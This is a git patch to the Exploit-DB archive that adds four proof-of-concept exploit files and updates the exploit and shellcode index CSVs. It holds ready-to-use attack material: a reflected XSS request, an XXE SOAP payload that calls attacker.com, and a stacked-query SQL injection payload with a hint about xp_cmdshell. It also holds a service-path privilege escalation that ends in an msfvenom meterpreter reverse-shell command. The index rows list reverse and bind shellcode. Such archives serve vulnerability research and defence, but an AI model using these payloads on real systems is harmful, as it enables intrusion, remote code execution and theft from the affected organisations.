From 91ac09507e141d21cea6c54291412f15c311da6a Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 28 Sep 2018 05:01:59 +0000
Subject: [PATCH] DB: 2018-09-28

4 changes to exploits/shellcodes

EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation
iWay Data Quality Suite Web Console 10.6.1.ga - XML External Entity Injection
ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting
Rausoft ID.prove 2.95 - 'Username' SQL injection

Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes)
Linux/x86 - Bind (5555/TCP) Shell (/bin/sh) Shellcode (98 bytes)
---
 exploits/java/webapps/45499.txt           | 31 ++++++++++
 exploits/windows/local/45501.txt          | 73 +++++++++++++++++++++++
 exploits/windows/webapps/45498.txt        | 42 +++++++++++++
 exploits/windows_x86-64/webapps/45500.txt | 20 +++++++
 files_exploits.csv                        |  4 ++
 files_shellcodes.csv                      |  2 +-
 6 files changed, 171 insertions(+), 1 deletion(-)
 create mode 100644 exploits/java/webapps/45499.txt
 create mode 100644 exploits/windows/local/45501.txt
 create mode 100644 exploits/windows/webapps/45498.txt
 create mode 100644 exploits/windows_x86-64/webapps/45500.txt

diff --git a/exploits/java/webapps/45499.txt b/exploits/java/webapps/45499.txt
new file mode 100644
index 000000000..779465e47
--- /dev/null
+++ b/exploits/java/webapps/45499.txt
@@ -0,0 +1,31 @@
+# Exploit Title: ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting
+# Date: 2018-09-11 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.manageengine.com/
+# Hardware Link : https://www.manageengine.com/products/desktop-central/
+# Software : ZOHO Corp ManageEngine Desktop Central 10
+# Product Version: 10.0.271
+# Vulernability Type : Cross-site Scripting
+# Vulenrability : Reflected 
+# CVE : CVE-2018-16833
+
+# Zoho ManageEngine Desktop Central 10.0.271 has XSS via the "Features & Articles" 
+# search field to the /advsearch.do?SUBREQUEST=XMLHTTP URI.
+ 
+# HTTP Request Header :
+
+POST /advsearch.do?SUBREQUEST=XMLHTTP HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://TARGET/homePage.do?actionToCall=homePageDetails
+X-Requested-With: XMLHttpRequest
+Content-type: application/x-www-form-urlencoded;charset=UTF-8
+X-ZCSRF-TOKEN: =All
+Content-Length: 222
+Cookie: DCJSESSIONID=34B31AEA87E0A617AB23A607C980CC07; DCJSESSIONIDSSO=0738458E311E15CD1E28F27F1DED5388; dc_customerid=All; summarypage=true; DM_SPDA_LST=1536665909495
+Connection: close
+
+q="><img src=x onerror=alert('ismailtasdelen')>&src=sall&stab=Home&page=1&pagelimit=10&searchParamId=901&searchParamName=dm.advsearch.features.articles&id=1536666162979&isTriggerFromMenu=false&actionToCall=getSearchResults
\ No newline at end of file
diff --git a/exploits/windows/local/45501.txt b/exploits/windows/local/45501.txt
new file mode 100644
index 000000000..e1aca9ca6
--- /dev/null
+++ b/exploits/windows/local/45501.txt
@@ -0,0 +1,73 @@
+# Title: EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation 
+# Date: 2018-09-22
+# Software Version: EE40_00_02.00_44
+# Tested on: Windows 10 64-bit and Windows 7 64-bit
+# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
+# Original Advisory: http://blog.zerodaylab.com/2018/09/zerodaylab-discovers-ee-unquoted.html
+# Original Write-up: https://osandamalith.com/2018/09/17/ee-4gee-mini-local-privilege-escalation-vulnerability-cve-2018-14327/
+# CVE: CVE-2018-14327
+# References
+# https://www.theregister.co.uk/2018/09/19/ee_modem_vuln/
+# https://thehackernews.com/2018/09/4g-ee-wifi-modem-hack.html
+
+# PoC
+
+C:\>sc qc "Alcatel OSPREY3_MINI Modem Device Helper"
+[SC] QueryServiceConfig SUCCESS
+ 
+SERVICE_NAME: Alcatel OSPREY3_MINI Modem Device Helper
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Web Connecton\EE40\BackgroundService\ServiceManager.exe -start
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Alcatel OSPREY3_MINI Modem Device Helper
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+
+# Weak Folder Permissions
+
+C:\Program Files (x86)\Web Connecton>icacls EE40
+EE40 Everyone:(OI)(CI)(F)
+     NT SERVICE\TrustedInstaller:(I)(F)
+     NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+     NT AUTHORITY\SYSTEM:(I)(F)
+     NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+     BUILTIN\Administrators:(I)(F)
+     BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+     BUILTIN\Users:(I)(RX)
+     BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+     CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
+     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
+     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+ 
+Successfully processed 1 files; Failed processing 0 files
+ 
+C:\Program Files (x86)\Web Connecton>
+C:\Program Files (x86)\Web Connecton>
+C:\Program Files (x86)\Web Connecton>icacls EE40\BackgroundService
+EE40\BackgroundService Everyone:(OI)(CI)(F)
+                       Everyone:(I)(OI)(CI)(F)
+                       NT SERVICE\TrustedInstaller:(I)(F)
+                       NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+                       NT AUTHORITY\SYSTEM:(I)(F)
+                       NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+                       BUILTIN\Administrators:(I)(F)
+                       BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+                       BUILTIN\Users:(I)(RX)
+                       BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+                       CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+                       APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
+                       APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+                       APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
+                       APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+ 
+Successfully processed 1 files; Failed processing 0 files
+
+# Example Payload
+
+msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.4 lport=443 -f exe -o rev_shell.exe
\ No newline at end of file
diff --git a/exploits/windows/webapps/45498.txt b/exploits/windows/webapps/45498.txt
new file mode 100644
index 000000000..657214a08
--- /dev/null
+++ b/exploits/windows/webapps/45498.txt
@@ -0,0 +1,42 @@
+# Exploit Title: iWay Data Quality Suite Web Console 10.6.1.ga-2016-11-20 – XML External Entity Injection
+# Google Dork: N/A
+# Date: 2018-09-27
+# Exploit Author: Sureshbabu Narvaneni#
+# Author Blog : https://nullnews.in
+# Vendor Homepage: www.informationbuilders.co.uk
+# Software Link: http://www.informationbuilders.co.uk/products/integrity/dqsuite
+# Affected Version: 10.6.1.ga
+# Category: WebApps
+# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
+# CVE : N/A
+
+# Technical Description:
+# iWay Data Quality Suite Web Console provides web services features. As there is no
+# validation present on the web services featured by product while processing
+# the user input an attacker can easily inject external entities in the SOAP request and can 
+# achieve the successful Remote Code Execution on the server
+
+# Proof Of Concept:
+
+> Access the iWay DQS Web Console application section.
+> Create an entry for web service and form a sample SOAP request.
+> Send below crafted request to the server to confirm the vulnerability
+
+<?xml version="1.0"?>
+<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://attacker.com/xxetest">]>
+<soapenv:Envelope
+xml:soapenv="http://schemas.xmlsoap.org/soap/envelope"
+xmlns:ws="http://www.example.com/ws">
+<soapenv:Header/>
+<soapenv:Body>
+<ws:test>
+<ws:in>&xxe;</ws:in>
+</ws:test>
+</soapenv:Body>
+</soapenv:Envelope>
+
+> The below log shows that the web service component is vulnerable to XXE.
+
+root@MrR3boot:/var/www/html# tail -f /var/log/apache2/access.log
+1xx.xx.xxx.xx - - [25/Sep/2018:01:13:42 -0400] "GET /xxetest HTTP/1.0" 404
+474 "-" "-"
\ No newline at end of file
diff --git a/exploits/windows_x86-64/webapps/45500.txt b/exploits/windows_x86-64/webapps/45500.txt
new file mode 100644
index 000000000..bdb4386f6
--- /dev/null
+++ b/exploits/windows_x86-64/webapps/45500.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Rausoft ID.prove 2.95 - 'Username' SQL injection
+# Google Dork: inurl:IdproveWebclient
+# Date: 2018-09-26
+# Exploit Author: Ilya Timchenko, Mercedes pay S.A.
+# Vendor Homepage: https://www.idprove.de
+# Software Link: https://www.idprove.de/english/index.php?option=com_content&view=article&id=17&Itemid=3
+# Version: 2.95
+# Tested on: Windows 2016
+# CVE : N/A
+# Description: An issue was discovered in Rausoft ID.prove 2.95. The login page with a field "Username" 
+# https://<<FQDN>>/IdproveWebclient/Account/Login?ReturnUrl=%2fIdproveWebclient%2fEinzelsuche --data="__RequestVerificationToken=<<dynamic_token_value>>&Username=a&PasswordTemp=a"
+# is vulnerable to the SQL injection via Microsoft SQL Server stacked queries in the Username POST parameter. 
+# Hypothetically, an attacker can utilize master..xp_cmdshell for the further privilege elevation.
+
+# SQLmap output:
+# Parameter: #1* ((custom) POST)
+# Type: stacked queries
+# Title: Microsoft SQL Server/Sybase stacked queries (comment)
+
+Payload: __RequestVerificationToken=<<dynamic_token_value>>&Username=a';WAITFOR DELAY '0:0:5'--&PasswordTemp=a
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b84dff0c7..93340d5b0 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10004,6 +10004,7 @@ id,file,description,date,author,type,platform,port
 45479,exploits/solaris/local/45479.rb,"Solaris - 'EXTREMEPARR' dtappgather Privilege Escalation (Metasploit)",2018-09-25,Metasploit,local,solaris,
 45492,exploits/windows_x86/local/45492.py,"Faleemi Desktop Software 1.8.2 - 'Device alias' Local Buffer Overflow (SEH)",2018-09-25,"Gionathan Reale",local,windows_x86,
 45497,exploits/linux/local/45497.txt,"Linux - VMA Use-After-Free via Buggy vmacache_flush_all() Fastpath",2018-09-26,"Google Security Research",local,linux,
+45501,exploits/windows/local/45501.txt,"EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation",2018-09-27,"Osanda Malith Jayathissa",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -40038,3 +40039,6 @@ id,file,description,date,author,type,platform,port
 45487,exploits/hardware/webapps/45487.txt,"RICOH MP 305+ Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware,
 45490,exploits/hardware/webapps/45490.txt,"RICOH MP C406Z Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware,
 45491,exploits/php/webapps/45491.txt,"Joomla! Component Responsive Portfolio 1.6.1 - 'filter_order_Dir' SQL Injection",2018-09-25,AkkuS,webapps,php,
+45498,exploits/windows/webapps/45498.txt,"iWay Data Quality Suite Web Console 10.6.1.ga - XML External Entity Injection",2018-09-27,"Sureshbabu Narvaneni",webapps,windows,
+45499,exploits/java/webapps/45499.txt,"ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting",2018-09-27,"Ismail Tasdelen",webapps,java,
+45500,exploits/windows_x86-64/webapps/45500.txt,"Rausoft ID.prove 2.95 - 'Username' SQL injection",2018-09-27,"Ilya Timchenko",webapps,windows_x86-64,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 83e9cfe70..083fd7f4a 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -887,7 +887,7 @@ id,file,description,date,author,type,platform
 44723,shellcodes/linux_x86/44723.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (113 bytes)",2018-05-23,"Matteo Malvica",shellcode,linux_x86
 44738,shellcodes/linux_x86/44738.c,"Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes)",2018-05-24,"Nuno Freitas",shellcode,linux_x86
 44740,shellcodes/linux_x86/44740.c,"Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes)",2018-05-24,"Jonathan Crosby",shellcode,linux_x86
-44791,shellcodes/linux_x86/44791.c,"Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes)",2018-05-28,Luca,shellcode,linux_x86
+44791,shellcodes/linux_x86/44791.c,"Linux/x86 - Bind (5555/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2018-05-28,Luca,shellcode,linux_x86
 44807,shellcodes/linux_x86/44807.c,"Linux/x86 - Egghunter (0xdeadbeef) + access() + execve(/bin/sh) Shellcode (38 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
 44808,shellcodes/linux_x86/44808.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
 44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm